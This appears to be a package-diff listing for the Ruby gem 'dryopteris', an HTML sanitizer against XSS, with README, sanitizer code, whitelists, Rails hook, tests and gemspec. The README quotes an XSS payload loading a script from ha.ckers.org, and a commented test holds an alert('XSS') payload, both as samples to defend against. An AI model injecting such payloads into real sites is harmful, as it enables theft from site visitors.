mdalessio-dryopteris 0.1.0

Sign up to get free protection for your applications and to get access to all the features.
data/README.markdown ADDED
@@ -0,0 +1,77 @@
1
+ Dryopteris
2
+ ==========
3
+
4
+ Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
5
+
6
+ * [Dryopteris erythrosora](http://en.wikipedia.org/wiki/Dryopteris_erythrosora)
7
+ * [XSS Attacks](http://en.wikipedia.org/wiki/Cross-site_scripting)
8
+
9
+ Usage
10
+ -----
11
+
12
+ Let's say you run a web site, and you allow people to post HTML snippets.
13
+
14
+ Let's also say some script-kiddie from Norland posts this to your site, in an effort to swipe some credit cards:
15
+
16
+ <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
17
+
18
+ Oooh, that could be bad. Here's how to fix it:
19
+
20
+ safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
21
+
22
+ Yeah, it's that easy.
23
+
24
+ In this example, <tt>safe\_html\_snippet</tt> will have all of its __broken markup fixed__ by libxml2, and it will also be completely __sanitized of harmful tags and attributes__. That's twice as clean!
25
+
26
+
27
+ More Usage
28
+ -----
29
+
30
+ You're still here? Ok, let me tell you a little something about the two different methods of sanitizing the Dryopteris offers.
31
+
32
+ ### Fragments
33
+
34
+ The first method is for _html fragments_, which are small snippets of markup such as those used in forum posts, emails and homework assignments.
35
+
36
+ Usage is the same as above:
37
+
38
+ safe_html_snippet = Dryopteris.sanitize(dangerous_html_snippet)
39
+
40
+ Generally speaking, unless you expect to have &lt;html&gt; and &lt;body&gt; tags in your HTML, this is the sanitizing method to use.
41
+
42
+ The only real limitation on this method is that the snippet must be a string object. (Support for IO objects was sacrificed at the altar of fixer-uppery-ness. If you need to sanitize data that's coming from an IO object, either socket or file, check out the next section on __Documents__).
43
+
44
+ ### Documents
45
+
46
+ Sometimes you need to sanitize an entire HTML document. (Well, maybe not _you_, but other people, certainly.)
47
+
48
+ safe_html_document = Dryopteris.sanitize_document(dangerous_html_document)
49
+
50
+ The returned string will contain exactly one (1) well-formed HTML document, with all broken HTML fixed and all harmful tags and attributes removed.
51
+
52
+ Coolness: <tt>dangerous\_html\_document</tt> can be a string OR an IO object (a file, or a socket, or ...). Which makes it particularly easy to sanitize large numbers of docs.
53
+
54
+
55
+ Standing on the Shoulders of Giants
56
+ -----
57
+
58
+ Dryopteris uses [Nokogiri](http://nokogiri.rubyforge.org/) and [libxml2](http://xmlsoft.org/), so it's fast.
59
+
60
+ Dryopteris also takes its tag and tag attribute whitelists and its CSS sanitizer directly from [HTML5](http://code.google.com/p/html5lib/).
61
+
62
+
63
+ Authors
64
+ -----
65
+ * [Bryan Helmkamp](http://www.brynary.com/)
66
+ * [Mike Dalessio](http://mike.daless.io/) ([twitter](http://twitter.com/flavorjones))
67
+
68
+
69
+ Quotes About Dryopteris
70
+ -----
71
+
72
+ > "dryopteris shields you from xss attacks using nokogiri and NY attitude"
73
+ > - [hasmanyjosh](http://blog.hasmanythrough.com/)
74
+
75
+ > "I just wanted to say thank you for your dryopteris plugin. It is by far the best sanitization I've found."
76
+ > - [catalystmediastudios](http://github.com/catalystmediastudios)
77
+
data/VERSION.yml ADDED
@@ -0,0 +1,4 @@
1
+ ---
2
+ :major: 0
3
+ :minor: 0
4
+ :patch: 0
@@ -0,0 +1,46 @@
1
+ require "dryopteris"
2
+
3
+ module Dryopteris
4
+ module RailsExtension
5
+ def self.included(base)
6
+ base.extend(ClassMethods)
7
+
8
+ # sets up default of stripping tags for all fields
9
+ base.class_eval do
10
+ before_save :sanitize_fields
11
+ class_inheritable_reader :dryopteris_options
12
+ end
13
+ end
14
+
15
+ module ClassMethods
16
+ def sanitize_fields(options = {})
17
+ write_inheritable_attribute(:dryopteris_options, {
18
+ :except => (options[:except] || []),
19
+ :allow_tags => (options[:allow_tags] || [])
20
+ })
21
+ end
22
+
23
+ alias_method :sanitize_field, :sanitize_fields
24
+ end
25
+
26
+
27
+ def sanitize_fields
28
+ self.class.columns.each do |column|
29
+ next unless (column.type == :string || column.type == :text)
30
+
31
+ field = column.name.to_sym
32
+ value = self[field]
33
+
34
+ if dryopteris_options && dryopteris_options[:except].include?(field)
35
+ next
36
+ elsif dryopteris_options && dryopteris_options[:allow_tags].include?(field)
37
+ self[field] = Dryopteris.sanitize(value)
38
+ else
39
+ self[field] = Dryopteris.strip_tags(value)
40
+ end
41
+ end
42
+
43
+ end
44
+
45
+ end
46
+ end
@@ -0,0 +1,135 @@
1
+ require 'rubygems'
2
+ gem 'nokogiri', '>=1.0.5'
3
+ require 'nokogiri'
4
+ require 'cgi'
5
+
6
+ require "dryopteris/whitelist"
7
+
8
+ module Dryopteris
9
+
10
+ class << self
11
+ def strip_tags(string_or_io, encoding=nil)
12
+ return nil if string_or_io.nil?
13
+ return "" if string_or_io.strip.size == 0
14
+
15
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
16
+ body_element = doc.at("/html/body")
17
+ return "" if body_element.nil?
18
+ body_element.inner_text
19
+ end
20
+
21
+ def sanitize(string, encoding=nil)
22
+ return nil if string.nil?
23
+ return "" if string.strip.size == 0
24
+
25
+ string = "<html><body>" + string + "</body></html>"
26
+ doc = Nokogiri::HTML.parse(string, nil, encoding)
27
+ body = doc.xpath("/html/body").first
28
+ return "" if body.nil?
29
+ body.children.each do |node|
30
+ traverse_conditionally_top_down(node, :sanitize_node)
31
+ end
32
+ body.children.map { |x| x.to_xml }.join
33
+ end
34
+
35
+ def sanitize_document(string_or_io, encoding=nil)
36
+ return nil if string_or_io.nil?
37
+ return "" if string_or_io.strip.size == 0
38
+
39
+ doc = Nokogiri::HTML.parse(string_or_io, nil, encoding)
40
+ elements = doc.xpath("/html/head/*","/html/body/*")
41
+ return "" if (elements.nil? || elements.empty?)
42
+ elements.each do |node|
43
+ traverse_conditionally_top_down(node, :sanitize_node)
44
+ end
45
+ doc.root.to_xml
46
+ end
47
+
48
+ private
49
+ def traverse_conditionally_top_down(node, method_name)
50
+ return if send(method_name, node)
51
+ node.children.each {|j| traverse_conditionally_top_down(j, method_name)}
52
+ end
53
+
54
+ def remove_tags_from_node(node)
55
+ replacement_killer = Nokogiri::XML::Text.new(node.text, node.document)
56
+ node.add_next_sibling(replacement_killer)
57
+ node.remove
58
+ return true
59
+ end
60
+
61
+ def sanitize_node(node)
62
+ case node.type
63
+ when 1 # Nokogiri::XML::Node::ELEMENT_NODE
64
+ if HashedWhiteList::ALLOWED_ELEMENTS[node.name]
65
+ node.attributes.each do |attr|
66
+ node.remove_attribute(attr.first) unless HashedWhiteList::ALLOWED_ATTRIBUTES[attr.first]
67
+ end
68
+ node.attributes.each do |attr|
69
+ if HashedWhiteList::ATTR_VAL_IS_URI[attr.first]
70
+ # this block lifted nearly verbatim from HTML5 sanitization
71
+ val_unescaped = CGI.unescapeHTML(attr.last.to_s).gsub(/`|[\000-\040\177\s]+|\302[\200-\240]/,'').downcase
72
+ if val_unescaped =~ /^[a-z0-9][-+.a-z0-9]*:/ and HashedWhiteList::ALLOWED_PROTOCOLS[val_unescaped.split(':')[0]].nil?
73
+ node.remove_attribute(attr.first)
74
+ end
75
+ end
76
+ end
77
+ if node.attributes['style']
78
+ node['style'] = sanitize_css(node.attributes['style'])
79
+ end
80
+ return false
81
+ end
82
+ when 3 # Nokogiri::XML::Node::TEXT_NODE
83
+ return false
84
+ when 4 # Nokogiri::XML::Node::CDATA_SECTION_NODE
85
+ return false
86
+ end
87
+ replacement_killer = Nokogiri::XML::Text.new(node.to_s, node.document)
88
+ node.add_next_sibling(replacement_killer)
89
+ node.remove
90
+ return true
91
+ end
92
+
93
+
94
+ # this liftend nearly verbatim from html5
95
+ def sanitize_css(style)
96
+ # disallow urls
97
+ style = style.to_s.gsub(/url\s*\(\s*[^\s)]+?\s*\)\s*/, ' ')
98
+
99
+ # gauntlet
100
+ return '' unless style =~ /^([:,;#%.\sa-zA-Z0-9!]|\w-\w|\'[\s\w]+\'|\"[\s\w]+\"|\([\d,\s]+\))*$/
101
+ return '' unless style =~ /^\s*([-\w]+\s*:[^:;]*(;\s*|$))*$/
102
+
103
+ clean = []
104
+ style.scan(/([-\w]+)\s*:\s*([^:;]*)/) do |prop, val|
105
+ next if val.empty?
106
+ prop.downcase!
107
+ if HashedWhiteList::ALLOWED_CSS_PROPERTIES[prop]
108
+ clean << "#{prop}: #{val};"
109
+ elsif %w[background border margin padding].include?(prop.split('-')[0])
110
+ clean << "#{prop}: #{val};" unless val.split().any? do |keyword|
111
+ HashedWhiteList::ALLOWED_CSS_KEYWORDS[keyword].nil? and
112
+ keyword !~ /^(#[0-9a-f]+|rgb\(\d+%?,\d*%?,?\d*%?\)?|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?)$/
113
+ end
114
+ elsif HashedWhiteList::ALLOWED_SVG_PROPERTIES[prop]
115
+ clean << "#{prop}: #{val};"
116
+ end
117
+ end
118
+
119
+ style = clean.join(' ')
120
+ end
121
+
122
+ end # self
123
+
124
+ module HashedWhiteList
125
+ # turn each of the whitelist arrays into a hash for faster lookup
126
+ WhiteList.constants.each do |constant|
127
+ next unless WhiteList.module_eval("#{constant}").is_a?(Array)
128
+ module_eval <<-CODE
129
+ #{constant} = {}
130
+ WhiteList::#{constant}.each { |c| #{constant}[c] = true ; #{constant}[c.downcase] = true }
131
+ CODE
132
+ end
133
+ end
134
+
135
+ end
@@ -0,0 +1,148 @@
1
+ #
2
+ # HTML whitelist lifted from HTML5 sanitizer code
3
+ # http://code.google.com/p/html5lib/
4
+ #
5
+
6
+ module Dryopteris
7
+ module WhiteList
8
+ # <html5_license>
9
+ #
10
+ # Copyright (c) 2006-2008 The Authors
11
+ #
12
+ # Contributors:
13
+ # James Graham - jg307@cam.ac.uk
14
+ # Anne van Kesteren - annevankesteren@gmail.com
15
+ # Lachlan Hunt - lachlan.hunt@lachy.id.au
16
+ # Matt McDonald - kanashii@kanashii.ca
17
+ # Sam Ruby - rubys@intertwingly.net
18
+ # Ian Hickson (Google) - ian@hixie.ch
19
+ # Thomas Broyer - t.broyer@ltgt.net
20
+ # Jacques Distler - distler@golem.ph.utexas.edu
21
+ # Henri Sivonen - hsivonen@iki.fi
22
+ # The Mozilla Foundation (contributions from Henri Sivonen since 2008)
23
+ #
24
+ # Permission is hereby granted, free of charge, to any person
25
+ # obtaining a copy of this software and associated documentation
26
+ # files (the "Software"), to deal in the Software without
27
+ # restriction, including without limitation the rights to use, copy,
28
+ # modify, merge, publish, distribute, sublicense, and/or sell copies
29
+ # of the Software, and to permit persons to whom the Software is
30
+ # furnished to do so, subject to the following conditions:
31
+ #
32
+ # The above copyright notice and this permission notice shall be
33
+ # included in all copies or substantial portions of the Software.
34
+ #
35
+ # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
36
+ # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
37
+ # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
38
+ # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
39
+ # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
40
+ # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
41
+ # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
42
+ # DEALINGS IN THE SOFTWARE.
43
+ #
44
+ # </html5_license>
45
+
46
+ ACCEPTABLE_ELEMENTS = %w[a abbr acronym address area b big blockquote br
47
+ button caption center cite code col colgroup dd del dfn dir div dl dt
48
+ em fieldset font form h1 h2 h3 h4 h5 h6 hr i img input ins kbd label
49
+ legend li map menu ol optgroup option p pre q s samp select small span
50
+ strike strong sub sup table tbody td textarea tfoot th thead tr tt u
51
+ ul var]
52
+
53
+ MATHML_ELEMENTS = %w[maction math merror mfrac mi mmultiscripts mn mo
54
+ mover mpadded mphantom mprescripts mroot mrow mspace msqrt mstyle msub
55
+ msubsup msup mtable mtd mtext mtr munder munderover none]
56
+
57
+ SVG_ELEMENTS = %w[a animate animateColor animateMotion animateTransform
58
+ circle defs desc ellipse font-face font-face-name font-face-src g
59
+ glyph hkern image linearGradient line marker metadata missing-glyph
60
+ mpath path polygon polyline radialGradient rect set stop svg switch
61
+ text title tspan use]
62
+
63
+ ACCEPTABLE_ATTRIBUTES = %w[abbr accept accept-charset accesskey action
64
+ align alt axis border cellpadding cellspacing char charoff charset
65
+ checked cite class clear cols colspan color compact coords datetime
66
+ dir disabled enctype for frame headers height href hreflang hspace id
67
+ ismap label lang longdesc maxlength media method multiple name nohref
68
+ noshade nowrap prompt readonly rel rev rows rowspan rules scope
69
+ selected shape size span src start style summary tabindex target title
70
+ type usemap valign value vspace width xml:lang]
71
+
72
+ MATHML_ATTRIBUTES = %w[actiontype align columnalign columnalign
73
+ columnalign columnlines columnspacing columnspan depth display
74
+ displaystyle equalcolumns equalrows fence fontstyle fontweight frame
75
+ height linethickness lspace mathbackground mathcolor mathvariant
76
+ mathvariant maxsize minsize other rowalign rowalign rowalign rowlines
77
+ rowspacing rowspan rspace scriptlevel selection separator stretchy
78
+ width width xlink:href xlink:show xlink:type xmlns xmlns:xlink]
79
+
80
+ SVG_ATTRIBUTES = %w[accent-height accumulate additive alphabetic
81
+ arabic-form ascent attributeName attributeType baseProfile bbox begin
82
+ by calcMode cap-height class color color-rendering content cx cy d dx
83
+ dy descent display dur end fill fill-rule font-family font-size
84
+ font-stretch font-style font-variant font-weight from fx fy g1 g2
85
+ glyph-name gradientUnits hanging height horiz-adv-x horiz-origin-x id
86
+ ideographic k keyPoints keySplines keyTimes lang marker-end
87
+ marker-mid marker-start markerHeight markerUnits markerWidth
88
+ mathematical max min name offset opacity orient origin
89
+ overline-position overline-thickness panose-1 path pathLength points
90
+ preserveAspectRatio r refX refY repeatCount repeatDur
91
+ requiredExtensions requiredFeatures restart rotate rx ry slope stemh
92
+ stemv stop-color stop-opacity strikethrough-position
93
+ strikethrough-thickness stroke stroke-dasharray stroke-dashoffset
94
+ stroke-linecap stroke-linejoin stroke-miterlimit stroke-opacity
95
+ stroke-width systemLanguage target text-anchor to transform type u1
96
+ u2 underline-position underline-thickness unicode unicode-range
97
+ units-per-em values version viewBox visibility width widths x
98
+ x-height x1 x2 xlink:actuate xlink:arcrole xlink:href xlink:role
99
+ xlink:show xlink:title xlink:type xml:base xml:lang xml:space xmlns
100
+ xmlns:xlink y y1 y2 zoomAndPan]
101
+
102
+ ATTR_VAL_IS_URI = %w[href src cite action longdesc xlink:href xml:base]
103
+
104
+ ACCEPTABLE_CSS_PROPERTIES = %w[azimuth background-color
105
+ border-bottom-color border-collapse border-color border-left-color
106
+ border-right-color border-top-color clear color cursor direction
107
+ display elevation float font font-family font-size font-style
108
+ font-variant font-weight height letter-spacing line-height overflow
109
+ pause pause-after pause-before pitch pitch-range richness speak
110
+ speak-header speak-numeral speak-punctuation speech-rate stress
111
+ text-align text-decoration text-indent unicode-bidi vertical-align
112
+ voice-family volume white-space width]
113
+
114
+ ACCEPTABLE_CSS_KEYWORDS = %w[auto aqua black block blue bold both bottom
115
+ brown center collapse dashed dotted fuchsia gray green !important
116
+ italic left lime maroon medium none navy normal nowrap olive pointer
117
+ purple red right solid silver teal top transparent underline white
118
+ yellow]
119
+
120
+ ACCEPTABLE_SVG_PROPERTIES = %w[fill fill-opacity fill-rule stroke
121
+ stroke-width stroke-linecap stroke-linejoin stroke-opacity]
122
+
123
+ ACCEPTABLE_PROTOCOLS = %w[ed2k ftp http https irc mailto news gopher nntp
124
+ telnet webcal xmpp callto feed urn aim rsync tag ssh sftp rtsp afs]
125
+
126
+ # subclasses may define their own versions of these constants
127
+ ALLOWED_ELEMENTS = ACCEPTABLE_ELEMENTS + MATHML_ELEMENTS + SVG_ELEMENTS
128
+ ALLOWED_ATTRIBUTES = ACCEPTABLE_ATTRIBUTES + MATHML_ATTRIBUTES + SVG_ATTRIBUTES
129
+ ALLOWED_CSS_PROPERTIES = ACCEPTABLE_CSS_PROPERTIES
130
+ ALLOWED_CSS_KEYWORDS = ACCEPTABLE_CSS_KEYWORDS
131
+ ALLOWED_SVG_PROPERTIES = ACCEPTABLE_SVG_PROPERTIES
132
+ ALLOWED_PROTOCOLS = ACCEPTABLE_PROTOCOLS
133
+
134
+ VOID_ELEMENTS = %w[
135
+ base
136
+ link
137
+ meta
138
+ hr
139
+ br
140
+ img
141
+ embed
142
+ param
143
+ area
144
+ col
145
+ input
146
+ ]
147
+ end
148
+ end
data/lib/dryopteris.rb ADDED
@@ -0,0 +1,7 @@
1
+ $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__))) unless $LOAD_PATH.include?(File.expand_path(File.dirname(__FILE__)))
2
+
3
+ require "dryopteris/sanitize"
4
+
5
+ module Dryopteris
6
+ VERSION = '0.1'
7
+ end
data/test/helper.rb ADDED
@@ -0,0 +1,2 @@
1
+ require 'test/unit'
2
+ require File.expand_path(File.join(File.dirname(__FILE__), "..", "lib", "dryopteris"))
@@ -0,0 +1,66 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class TestBasic < Test::Unit::TestCase
4
+
5
+ def test_nil
6
+ assert_nil Dryopteris.sanitize(nil)
7
+ end
8
+
9
+ def test_empty_string
10
+ assert_equal "", Dryopteris.sanitize("")
11
+ end
12
+
13
+ def test_removal_of_illegal_tag
14
+ html = <<-HTML
15
+ following this there should be no jim tag
16
+ <jim>jim</jim>
17
+ was there?
18
+ HTML
19
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
20
+ assert sane.xpath("//jim").empty?
21
+ end
22
+
23
+ def test_removal_of_illegal_attribute
24
+ html = "<p class=bar foo=bar abbr=bar />"
25
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
26
+ node = sane.xpath("//p").first
27
+ assert node.attributes['class']
28
+ assert node.attributes['abbr']
29
+ assert_nil node.attributes['foo']
30
+ end
31
+
32
+ def test_removal_of_illegal_url_in_href
33
+ html = <<-HTML
34
+ <a href='jimbo://jim.jim/'>this link should have its href removed because of illegal url</a>
35
+ <a href='http://jim.jim/'>this link should be fine</a>
36
+ HTML
37
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
38
+ nodes = sane.xpath("//a")
39
+ assert_nil nodes.first.attributes['href']
40
+ assert nodes.last.attributes['href']
41
+ end
42
+
43
+ def test_css_sanitization
44
+ html = "<p style='background-color: url(\"http://foo.com/\") ; background-color: #000 ;' />"
45
+ sane = Nokogiri::HTML(Dryopteris.sanitize(html))
46
+ assert_match(/#000/, sane.inner_html)
47
+ assert_no_match(/foo\.com/, sane.inner_html)
48
+ end
49
+
50
+ def test_fragment_with_no_tags
51
+ assert_equal "This fragment has no tags.", Dryopteris.sanitize("This fragment has no tags.")
52
+ end
53
+
54
+ def test_fragment_in_p_tag
55
+ assert_equal "<p>This fragment is in a p.</p>", Dryopteris.sanitize("<p>This fragment is in a p.</p>")
56
+ end
57
+
58
+ def test_fragment_in_a_nontrivial_p_tag
59
+ assert_equal " \n<p>This fragment is in a p.</p>", Dryopteris.sanitize(" \n<p foo='bar'>This fragment is in a p.</p>")
60
+ end
61
+
62
+ def test_fragment_in_p_tag_plus_stuff
63
+ assert_equal "<p>This fragment is in a p.</p>foo<strong>bar</strong>", Dryopteris.sanitize("<p>This fragment is in a p.</p>foo<strong>bar</strong>")
64
+ end
65
+
66
+ end
@@ -0,0 +1,141 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class SanitizeTest < Test::Unit::TestCase
4
+ include Dryopteris
5
+
6
+ def sanitize_html stream
7
+ Dryopteris.sanitize(stream)
8
+ end
9
+
10
+ def sanitize_doc stream
11
+ Dryopteris.sanitize_document(stream)
12
+ end
13
+
14
+ def check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
15
+ # libxml uses double-quotes, so let's swappo-boppo our quotes before comparing.
16
+ assert_equal htmloutput, sanitize_html(input).gsub(/"/,"'"), input
17
+
18
+ doc = sanitize_doc(input).gsub(/"/,"'")
19
+ assert doc.include?(htmloutput), "#{input}:\n#{doc}\nshould include:\n#{htmloutput}"
20
+ end
21
+
22
+ WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
23
+ define_method "test_should_allow_#{tag_name}_tag" do
24
+ input = "<#{tag_name} title='1'>foo <bad>bar</bad> baz</#{tag_name}>"
25
+ htmloutput = "<#{tag_name.downcase} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name.downcase}>"
26
+ xhtmloutput = "<#{tag_name} title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</#{tag_name}>"
27
+ rexmloutput = xhtmloutput
28
+
29
+ ##
30
+ ## these special cases are HTML5-tokenizer-dependent.
31
+ ## libxml2 cleans up HTML differently, and I trust that.
32
+ ##
33
+ # if %w[caption colgroup optgroup option tbody td tfoot th thead tr].include?(tag_name)
34
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
35
+ # xhtmloutput = htmloutput
36
+ # elsif tag_name == 'col'
37
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt; baz"
38
+ # xhtmloutput = htmloutput
39
+ # rexmloutput = "<col title='1' />"
40
+ # elsif tag_name == 'table'
41
+ # htmloutput = "foo &lt;bad&gt;bar&lt;/bad&gt;baz<table title='1'> </table>"
42
+ # xhtmloutput = htmloutput
43
+ # elsif tag_name == 'image'
44
+ # htmloutput = "<image title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
45
+ # xhtmloutput = htmloutput
46
+ # rexmloutput = "<image title='1'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</image>"
47
+ if WhiteList::VOID_ELEMENTS.include?(tag_name)
48
+ if Nokogiri::LIBXML_VERSION <= "2.6.16"
49
+ htmloutput = "<#{tag_name} title='1'/><p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
50
+ else
51
+ htmloutput = "<#{tag_name} title='1'/>foo &lt;bad&gt;bar&lt;/bad&gt; baz"
52
+ end
53
+ xhtmloutput = htmloutput
54
+ # htmloutput += '<br/>' if tag_name == 'br'
55
+ rexmloutput = "<#{tag_name} title='1' />"
56
+ end
57
+ check_sanitization(input, htmloutput, xhtmloutput, rexmloutput)
58
+ end
59
+ end
60
+
61
+ ##
62
+ ## libxml2 downcases tag names as it parses, so this is unnecessary.
63
+ ##
64
+ # WhiteList::ALLOWED_ELEMENTS.each do |tag_name|
65
+ # define_method "test_should_forbid_#{tag_name.upcase}_tag" do
66
+ # input = "<#{tag_name.upcase} title='1'>foo <bad>bar</bad> baz</#{tag_name.upcase}>"
67
+ # output = "&lt;#{tag_name.upcase} title=\"1\"&gt;foo &lt;bad&gt;bar&lt;/bad&gt; baz&lt;/#{tag_name.upcase}&gt;"
68
+ # check_sanitization(input, output, output, output)
69
+ # end
70
+ # end
71
+
72
+ WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
73
+ next if attribute_name == 'style'
74
+ next if attribute_name =~ /:/ && Nokogiri::LIBXML_VERSION <= '2.6.16'
75
+ define_method "test_should_allow_#{attribute_name}_attribute" do
76
+ input = "<p #{attribute_name}='foo'>foo <bad>bar</bad> baz</p>"
77
+ output = "<p #{attribute_name}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
78
+ htmloutput = "<p #{attribute_name.downcase}='foo'>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
79
+ check_sanitization(input, htmloutput, output, output)
80
+ end
81
+ end
82
+
83
+ ##
84
+ ## libxml2 downcases attributes as it parses, so this is unnecessary.
85
+ ##
86
+ # WhiteList::ALLOWED_ATTRIBUTES.each do |attribute_name|
87
+ # define_method "test_should_forbid_#{attribute_name.upcase}_attribute" do
88
+ # input = "<p #{attribute_name.upcase}='display: none;'>foo <bad>bar</bad> baz</p>"
89
+ # output = "<p>foo &lt;bad&gt;bar&lt;/bad&gt; baz</p>"
90
+ # check_sanitization(input, output, output, output)
91
+ # end
92
+ # end
93
+
94
+ WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
95
+ define_method "test_should_allow_#{protocol}_uris" do
96
+ input = %(<a href="#{protocol}">foo</a>)
97
+ output = "<a href='#{protocol}'>foo</a>"
98
+ check_sanitization(input, output, output, output)
99
+ end
100
+ end
101
+
102
+ WhiteList::ALLOWED_PROTOCOLS.each do |protocol|
103
+ define_method "test_should_allow_uppercase_#{protocol}_uris" do
104
+ input = %(<a href="#{protocol.upcase}">foo</a>)
105
+ output = "<a href='#{protocol.upcase}'>foo</a>"
106
+ check_sanitization(input, output, output, output)
107
+ end
108
+ end
109
+
110
+ if Nokogiri::LIBXML_VERSION > '2.6.16'
111
+ def test_should_handle_astral_plane_characters
112
+ input = "<p>&#x1d4b5; &#x1d538;</p>"
113
+ output = "<p>\360\235\222\265 \360\235\224\270</p>"
114
+ check_sanitization(input, output, output, output)
115
+
116
+ input = "<p><tspan>\360\235\224\270</tspan> a</p>"
117
+ output = "<p><tspan>\360\235\224\270</tspan> a</p>"
118
+ check_sanitization(input, output, output, output)
119
+ end
120
+ end
121
+
122
+ # This affects only NS4. Is it worth fixing?
123
+ # def test_javascript_includes
124
+ # input = %(<div size="&{alert('XSS')}">foo</div>)
125
+ # output = "<div>foo</div>"
126
+ # check_sanitization(input, output, output, output)
127
+ # end
128
+
129
+ #html5_test_files('sanitizer').each do |filename|
130
+ # JSON::parse(open(filename).read).each do |test|
131
+ # define_method "test_#{test['name']}" do
132
+ # check_sanitization(
133
+ # test['input'],
134
+ # test['output'],
135
+ # test['xhtml'] || test['output'],
136
+ # test['rexml'] || test['output']
137
+ # )
138
+ # end
139
+ # end
140
+ #end
141
+ end
@@ -0,0 +1,35 @@
1
+ require File.expand_path(File.join(File.dirname(__FILE__), 'helper'))
2
+
3
+ class TestStripTags < Test::Unit::TestCase
4
+
5
+ def test_nil
6
+ assert_nil Dryopteris.strip_tags(nil)
7
+ end
8
+
9
+ def test_empty_string
10
+ assert_equal Dryopteris.strip_tags(""), ""
11
+ end
12
+
13
+ def test_return_empty_string_when_nothing_left
14
+ assert_equal "", Dryopteris.strip_tags('<script>test</script>')
15
+ end
16
+
17
+ def test_removal_of_all_tags
18
+ html = <<-HTML
19
+ What's up <strong>doc</strong>?
20
+ HTML
21
+ stripped = Dryopteris.strip_tags(html)
22
+ assert_equal "What's up doc?".strip, stripped.strip
23
+ end
24
+
25
+ def test_dont_remove_whitespace
26
+ html = "Foo\nBar"
27
+ assert_equal html, Dryopteris.strip_tags(html)
28
+ end
29
+
30
+ def test_dont_remove_whitespace_between_tags
31
+ html = "<p>Foo</p>\n<p>Bar</p>"
32
+ assert_equal "Foo\nBar", Dryopteris.strip_tags(html)
33
+ end
34
+
35
+ end
metadata ADDED
@@ -0,0 +1,75 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: mdalessio-dryopteris
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.0
5
+ platform: ruby
6
+ authors:
7
+ - Bryan Helmkamp
8
+ - Mike Dalessio
9
+ autorequire:
10
+ bindir: bin
11
+ cert_chain: []
12
+
13
+ date: 2009-02-10 00:00:00 -08:00
14
+ default_executable:
15
+ dependencies:
16
+ - !ruby/object:Gem::Dependency
17
+ name: nokogiri
18
+ version_requirement:
19
+ version_requirements: !ruby/object:Gem::Requirement
20
+ requirements:
21
+ - - ">"
22
+ - !ruby/object:Gem::Version
23
+ version: 0.0.0
24
+ version:
25
+ description: Dryopteris erythrosora is the Japanese Shield Fern. It also can be used to sanitize HTML to help prevent XSS attacks.
26
+ email:
27
+ - bryan@brynary.com
28
+ - mike.dalessio@gmail.com
29
+ executables: []
30
+
31
+ extensions: []
32
+
33
+ extra_rdoc_files: []
34
+
35
+ files:
36
+ - README.markdown
37
+ - VERSION.yml
38
+ - lib/dryopteris
39
+ - lib/dryopteris/rails_extension.rb
40
+ - lib/dryopteris/sanitize.rb
41
+ - lib/dryopteris/whitelist.rb
42
+ - lib/dryopteris.rb
43
+ - test/test_basic.rb
44
+ - test/test_strip_tags.rb
45
+ - test/helper.rb
46
+ - test/test_sanitizer.rb
47
+ has_rdoc: true
48
+ homepage: http://github.com/brynary/dryopteris/tree/master
49
+ post_install_message:
50
+ rdoc_options:
51
+ - --inline-source
52
+ - --charset=UTF-8
53
+ require_paths:
54
+ - lib
55
+ required_ruby_version: !ruby/object:Gem::Requirement
56
+ requirements:
57
+ - - ">="
58
+ - !ruby/object:Gem::Version
59
+ version: "0"
60
+ version:
61
+ required_rubygems_version: !ruby/object:Gem::Requirement
62
+ requirements:
63
+ - - ">="
64
+ - !ruby/object:Gem::Version
65
+ version: "0"
66
+ version:
67
+ requirements: []
68
+
69
+ rubyforge_project:
70
+ rubygems_version: 1.2.0
71
+ signing_key:
72
+ specification_version: 2
73
+ summary: HTML sanitization using Nokogiri
74
+ test_files: []
75
+